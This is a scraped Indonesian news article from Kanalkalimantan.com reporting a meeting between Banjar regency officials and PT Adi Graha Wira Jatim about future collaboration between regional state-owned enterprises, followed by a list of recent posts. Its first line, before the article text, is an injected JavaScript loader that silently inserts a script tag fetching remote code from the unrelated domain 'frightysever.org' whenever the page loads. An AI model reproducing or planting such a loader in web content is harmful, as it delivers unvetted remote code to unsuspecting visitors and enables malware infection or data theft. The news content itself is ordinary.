(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Grup Wira Jatim Akan Kolaborasi dengan BUMD Banjar


KANALKALIMANTAN.COM, MARTAPURA– Memanfaatkan aset daerah dengan keberadaan Badan Usaha Milik Daerah (BUMD) di Kabupaten Banjar dengan BUMD Jawa Timur dilakukan untuk menambah wawasan perusahaan daerah. Harapannya ke depan BUMD di Banjar bisa lebih maju.

Hal tersebut disampaikan Sekda Banjar HM Hilman saat menerima audiensi PT. Adi Graha Wira Jatim di Aula Barakat Martapura, Kamis (14/4/2022) pagi.

Dikatakannya, Kabupaten Banjar memiliki beberapa BUMD yakni Perumda PBB, PT AM Intan Banjar dan Perseroda Baramarta yang bergerak di bidang masing-masing.

“Masih kami diskusikan apa yang akan dikolaborasikan nantinya sehingga Kabupaten Banjar bisa maju seperti Jawa Timur,” ucap Hilman.

 

Baca juga  : Rakor Lintas Sektoral Pemkab Banjar Siapkan Pengamanan Idul Fitri 1443 H

Dirinya berharap kolaborasi ini masih dalam tahap awal dan akan ditindaklanjuti nantinya ke tahap selanjutnya sehingga terjalin dengan baik dan bisa berkolaborasi sama sama saling menguntungkan.

Direktur PT. Adi Graha Wira Jatim, Eko Ganefianto mengungkapkan, perusahaannya tersebut bergerak di bidang properti komersial dan perhotelan.

“Kami mengelola beberapa lahan di Surabaya untuk disewakan dan juga mengelola dan membangun dua hotel yang saat ini sudah beroperasi cukup lama dengan lokasi yang strategis,” ujarnya.

Ia menambahkan dari audiensi ini pihaknya ingin memberikan sumbang saran kepada Kabupaten Banjar agar dapat berkolaborasi kedepan.

 

Baca juga  : BEM Se Kalsel Bawa 4 Tuntutan dan Minta DPRD Kalsel Gelar Sidang Rakyat!

Dijelaskannya, dirinya mewakili Group Wira Jatim dimana perusahaan tersebut juga termasuk BUMD yang dimiliki oleh Pemerintah Jawa Timur bergerak di berbagai bidang Industri, Manufaktur, Jasa, Perdagangan dan perwakilan Properti.

“Dengan memaparkan industri tersebut yang nanti akan dikaji ulang terkait kolaborasi yang pas untuk Kabupaten Banjar,” tuturnya.

Hadir Para Pimpinan Perusahaan Daerah dan beberapa Kepala SKPD Banjar serta stakeholder terkait. (Kanalkalimantan.com/kk)

Reporter : humas
Editor : cell


Desy Arfianty

Recent Posts

Pj Bupati Kapuas Erlin Hardi ke Desa Tumbang Mangkutup

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas, Erlin Hardi bersilaturahmi dengan masyarakat Desa Tumbang… Read More

7 jam ago

Satgas TMMD Beri Penyuluhan Pertanian dan Perikanan di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Setelah program non fisik sosialisasi PHBS (Perilaku Hidup bersih Sehat) dan masalah… Read More

7 jam ago

Banjarbaru Posisi Kedua Klasemen Sementara Popda Kalsel 2024

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah cabang olahraga (cabor) unggulan membawa kontingen Kota Banjarbaru bertengger di posisi… Read More

10 jam ago

Hasnur Resmi Lamar Partai Golkar, Mencari ‘Pintu’ Koalisi Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Langkah Hasnuryadi Sulaiman untuk maju pada kontestasi Pemilihan Gubernur dan Wakil Gubernur… Read More

11 jam ago

Pasti Maju Pilwali Banjarbaru, Ovie Simpan Nama Pasangan

KANALKALIMANTAN.COM, BANJARBARU - Aditya Mufti Ariffin memastikan akan kembali berkontestasi dalam Pemilihan Kepala Daerah (Pilkada)… Read More

12 jam ago

Soal Caleg Terpilih Mundur atau Tidak Mundur Jika Maju Pilkada, Begini Penjelasan KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Anggota Komisi Pemilihan Umum (KPU) Provinsi Kalimantan Selatan (Kalsel), Fahmi Failasopa menegaskan… Read More

15 jam ago

This website uses cookies.